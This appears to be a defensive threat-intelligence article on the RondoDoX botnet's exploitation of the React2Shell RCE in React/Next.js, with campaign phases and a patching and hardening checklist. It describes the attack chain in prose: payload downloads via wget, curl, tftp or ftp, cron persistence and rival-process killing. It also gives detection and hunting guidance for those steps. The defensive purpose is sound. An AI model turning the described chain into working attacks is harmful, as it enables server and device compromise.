In late 2025, a fast‑evolving campaign exposed how quickly modern botnets adapt to newly disclosed web flaws. RondoDoX, a cross‑architecture botnet active since early 2025, began by probing n‑day vulnerabilities in web apps and IoT gear—then weaponized the critical “React2Shell” RCE in React Server Components/Next.js to push miners and bot clients at enterprise scale. The result: hourly exploitation waves against Next.js Server Actions and internet‑facing routers/cameras, with payloads compiled for x86, x86_64, MIPS, ARM, and PowerPC, plus persistence and malware‑killing safeguards to monopolize host resources.
This article breaks down what RondoDoX is, how the React2Shell exploit works, the three operational phases CloudSEK observed, and the controls CISOs/SOCs should implement immediately to contain risk across web and IoT estates.
What Is the RondoDoX Botnet?
RondoDoX is a large‑scale IoT + web exploitation botnet first documented publicly in 2025. Earlier waves targeted flaws in DVRs and routers (e.g., TBK DVRs, Four‑Faith routers) to enroll devices and mimic gaming/VPN traffic for evasion; later, operators expanded to Next.js servers as soon as React2Shell (CVE‑2025‑55182) was disclosed.
By December 2025, CloudSEK’s analysis of exposed C2 logs over nine months (Mar–Dec 2025) confirmed RondoDoX’s multi‑stage evolution, automated scanning, hourly deployment attempts, and ten+ botnet variants delivering coin miners, Mirai‑based payloads, and a support framework that terminates rival malware and enforces persistence via cron.
React2Shell (CVE‑2025‑55182 / CVE‑2025‑66478): The Critical RCE Enabler
React2Shell is a CVSS 10.0 pre‑auth RCE in React Server Components (RSC), inherited by Next.js App Router implementations (tracked downstream as CVE‑2025‑66478, later aligned to the same root flaw). It abuses insecure Flight protocol deserialization—a single malicious HTTP request against server function endpoints (or default RSC paths) can achieve remote code execution.
- Disclosure timeline: Private report (Nov 29, 2025), public advisory (Dec 3–4, 2025), rapid real‑world exploitation within days; working PoCs appeared quickly.
- Affected stacks: React 19.0–19.2, Next.js 15.x/16.x (and certain 14.x canary builds), plus other RSC framework implementations. Patches released mid‑December.
- Scale of exposure: Tens of thousands of internet‑exposed assets vulnerable by late December per Shadowserver telemetry.
Why attackers love it: Default configs are exposed; pre‑auth RCE via a single request; easy automation; rapid bot deployment chains after initial execution.
RondoDoX Campaign Phases (Mar–Dec 2025)
CloudSEK’s C2‑log analysis correlates three distinct phases of the RondoDoX operation:
- Phase 1 – Manual Recon & Testing (Mar–Apr 2025)
- Sporadic, hands‑on vulnerability testing (SQLi, command injection, WebLogic deserialization).
- Phase 2 – Automated Web Exploitation (Apr–Jun 2025)
- Daily scans across WordPress, Drupal, Struts2 and early IoT probes; expanded webshell/miner deployment.
- Phase 3 – Hourly Botnet Deployment (Jul–Dec 2025)
- Industrialized bot enrollment with hourly waves; December pivot to React2Shell for Next.js servers; 40+ exploit attempts in six days recorded by researchers.
Operational breadth: At least six C2 servers, ten+ malware variants, and consistent deployment across multiple CPU architectures—all evidenced in logs and multi‑source reporting.
Attack Chain: From Blind RCE to Persistent Control
Step 1 – Target identification & blind RCE probes
Automated scans identify Next.js apps exposing RSC endpoints; blind RCE testing confirms exploitability (e.g., Dec 8–13, 2025 timeline).
Step 2 – Initial payload (ELF binary) deployment
Exploit triggers shell/Node commands to download ELF payloads from active C2 infrastructure using wget/curl/tftp/ftp for resilience.
Step 3 – Persistence & “resource monopoly”
A support framework (“/nuts/bolts”) enforces host dominance:
- Cron persistence via
/etc/crontab - Process policing: scans
/procand kills non‑whitelisted processes every ~45 seconds - Rival cleanup: removes competing miners/botnets, Docker artifacts, prior cron jobs
These behaviors free CPU/GPU for cryptominers and stabilize bot operations (“/nuts/poop” miner, Mirai‑variant “/nuts/x86”).
Step 4 – Cross‑architecture propagation
Payload kits for x86, x86_64, MIPS, ARM, PowerPC ensure coverage of servers, routers, cameras, and embedded systems—typical of modern Mirai‑lineage botnets.
Real‑World Scale & Collateral
- IoT waves: Hourly enrollments hitting Linksys, Wavlink and other brands; Next.js servers breached via React2Shell in parallel.
- Global exposure: ~90k+ RSC‑exposed assets vulnerable by Dec 31, 2025, with heavy concentration in the U.S. and exposure in Germany, France, India.
- Multi‑vector lineage: RondoDoX previously abused CVE‑2024‑3721, CVE‑2024‑12856, CVE‑2025‑24893 (XWiki RCE), showcasing a broad n‑day exploit shotgun approach.
Common Mistakes & Misconceptions
- “We don’t use Server Functions, so we’re safe.”
False. Apps supporting RSC can still be exploitable via default endpoints; patching is required. - “Our WAF blocks this by default.”
WAF helps, but pre‑auth deserialization RCE at framework endpoints often bypasses generic signatures; version upgrades are the primary fix. - “IoT isn’t part of our app risk.”
RondoDoX chains app and IoT weaknesses; compromised web servers can enable lateral movement to routers/cameras and vice versa.
Best Practices & Actionable Steps (Enterprise)
Immediate (72 hours)
- Patch/Upgrade
- React/Next.js to patched releases (Next.js 15.0.5/15.1.9/…/16.0.7; React 19.0.1/19.1.2/19.2.1). If on affected canary lines, apply fixed canaries or downgrade to the latest 14.x stable if advised.
- Rotate Secrets
- Per Next.js advisory, rotate credentials for apps online and unpatched during Dec 4, 2025 window.
- Block known C2s
- Apply perimeter firewall/IP blacklists for RondoDoX infrastructure reported by analysts; maintain deny lists as IOCs update.
- Harden IoT
- Disable remote management, update firmware, and isolate devices into dedicated VLANs; remove default creds.
Short Term (2–4 weeks)
- WAF/Reverse‑proxy hardening for RSC/Next.js routes, with strict HTTP verb/body validation on known endpoints (e.g.,
/_next/flight). - EDR/telemetry rules to flag cron changes, high‑frequency process kill loops, and miner binaries in temp directories.
- Network segmentation between web tiers and IoT/OT; enforce egress restrictions from IoT to the internet.
- Hunt for
wget/curl/tftp/ftpchains in web server logs; correlate with suspicious downloads from RondoDoX‑like hosts.
Medium Term (60–90 days)
- Secure build/runtime posture: pin to patched frameworks; CI/CD gates to reject vulnerable RSC packages.
- Tabletop exercises focused on pre‑auth RCE in app frameworks + IoT propagation; drill botnet eviction steps.
- Threat intel ingestion: subscribe to feeds tracking React2Shell and botnet infrastructure (Shadowserver, vendor advisories).
Tools, Frameworks & Standards
- NIST SP 800‑53 / SP 800‑207 (Zero Trust): Segment IoT; continuous verification for untrusted app endpoints.
- CISA KEV: React2Shell listed; prioritize patch SLAs.
- MITRE ATT&CK (Enterprise/ICS): Map to Initial Access (Exploit public‑facing app), Execution (Command/Scripting), Persistence (cron), Defense Evasion (kill processes).
Risk–Impact Analysis (C‑Level Summary)
| Vector | Likelihood (next 3–6 mo) | Impact | Primary Controls | Residual Risk |
|---|---|---|---|---|
| React2Shell RCE (Next.js) | High | Full server compromise; miner/bot deployment | Version upgrades, WAF tuning, secret rotation | New RCEs in RSC ecosystem possible |
| IoT router/camera compromise | High | DDoS node enrollment; lateral movement | VLAN isolation, firmware updates, disable remote mgmt | Supply‑chain firmware gaps persist |
| Process‑monopoly persistence | Medium | Host lock‑in; resource hijack | EDR detection of cron/process kill loops; miner signatures | Variants mutate faster than AV sigs |
| Multi‑C2 agility | Medium–High | Rapid infra retooling; evasion | IOC blocking + TI automation; egress filtering | Botnet rotates infra frequently |
Visual-Friendly Quick Checklist
- Patch Next.js/React (now).
- Rotate secrets if exposed.
- Block known RondoDoX C2s.
- Segment IoT into VLANs; update firmware.
- Monitor temp dirs & cron modifications; hunt for miners.
- WAF rules for RSC/Next.js endpoints.
Expert Insights
- Pre‑auth RCE in frameworks (like React2Shell) collapses traditional controls—no credentials, and often a single HTTP request to compromise. Framework patching beats perimeter controls.
- Botnet “host monopoly” patterns (cron + process‑kill loops) are strong detection anchors; tune EDR to flag 45‑sec kill cadence and miner paths.
- IoT is not incidental: campaigns chain web and device vectors; policy‑level isolation is essential.
FAQs (Schema‑friendly)
Q1. What exactly is React2Shell and why does it matter?
A. It’s a CVSS 10.0 pre‑auth RCE in React Server Components, inherited by Next.js. It enables code execution via one crafted request, making it ideal for botnet automation. Patch immediately.
Q2. How did RondoDoX use React2Shell?
A. After scanning for Next.js servers (Dec 8–13), operators deployed ELF payloads, miners, and a Mirai variant, enforcing persistence via cron and killing rival malware.
Q3. Are non‑Next.js React apps affected?
A. Any app/framework implementing RSC/Flight may be exposed until patched (e.g., React Router RSC, Waku, RedwoodSDK).
Q4. Which IoT devices were targeted?
A. Routers/cameras from brands like Linksys, Wavlink, D‑LINK, Four‑Faith, TBK DVRs, among others, across multiple campaigns and CVEs.
Q5. What persistence indicators should we hunt?
A. New entries in /etc/crontab, periodic process‑kill loops, miners in /tmp//var/tmp, and wget/curl/tftp/ftp download chains from suspicious hosts.
Conclusion
The RondoDoX botnet demonstrates how quickly adversaries can weaponize critical pre‑auth RCEs like React2Shell—shifting from routine web/IoT probing to hourly deployments and host‑monopolizing persistence. For security leaders, the response must be framework‑driven and infrastructure‑wide: patch React/Next.js, rotate secrets, segment IoT, tighten WAFs, and monitor cron/process behaviors that signal botnet tenancy.
